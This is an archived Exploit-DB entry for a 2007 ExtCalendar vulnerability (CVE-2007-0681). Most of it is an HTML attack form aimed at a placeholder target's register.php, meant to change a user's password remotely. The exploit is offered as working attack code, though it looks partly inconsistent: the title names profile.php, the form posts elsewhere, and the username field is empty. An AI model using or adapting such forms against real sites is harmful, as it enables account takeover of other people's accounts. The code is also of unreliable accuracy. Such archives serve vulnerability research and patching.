Extcalendar <= 2 profile.php Remote User Pass Change Exploit

2007-01-31T00:00:00
ID EDB-ID:3239
Type exploitdb
Reporter ajann
Modified 2007-01-31T00:00:00

Description

Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit. CVE-2007-0681. Webapps exploit for php platform

                                        
                                            &lt;form name="userform" action="http://[target]/register.php" method="post"&gt;
		&lt;input name="step" type="hidden" value="regform"&gt;


		&lt;tr&gt;
			&lt;td class='tableh2' colspan='2'&gt;Account Information&lt;/td&gt;

		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Username&lt;/td&gt;
			&lt;td class='tableb'&gt;
			&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Password&lt;/td&gt;

			&lt;td class='tableb'&gt;&lt;input type='password' name='password' class='textinput' value="" size='25' maxlength="16"&gt;
			&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Confirm Password&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='password' name='password_confirm' class='textinput' value="" size='25' maxlength="16"&gt;
			&lt;/td&gt;
		&lt;/tr&gt;

		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;E-mail Address&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='text' name='email' class='textinput' value="" size='25'&gt;
			&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td class='tableh2' colspan='2'&gt;Other Details&lt;/td&gt;
		&lt;/tr&gt;

		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;First Name&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='text' name='firstname' class='textinput' value="" size='25'&gt;
			&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Last Name&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='text' name='lastname' class='textinput' value="" size='25'&gt;

			&lt;/td&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Home page&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='text' name='user_website' class='textinput' value="" size='25'&gt;
			&lt;/td&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Location&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='text' name='user_location' class='textinput' value="" size='25'&gt;

			&lt;/td&gt;
		&lt;tr&gt;
			&lt;td class='tableb' width='160'&gt;Occupation&lt;/td&gt;
			&lt;td class='tableb'&gt;&lt;input type='text' name='user_occupation' class='textinput' value="" size='25'&gt;
			&lt;/td&gt;
		&lt;/tr&gt;

		&lt;tr&gt;

			&lt;td class='tablec' colspan='2' align='center' valign='middle' height='40'&gt;
				&lt;input name='submit' type='submit' value="&nbsp;&nbsp;Submit my registration&nbsp;&nbsp;" class='button'&gt;
			&lt;/td&gt;
		&lt;/tr&gt;
&lt;!-- END submit_row --&gt;
	&lt;/form&gt;

# milw0rm.com [2007-01-31]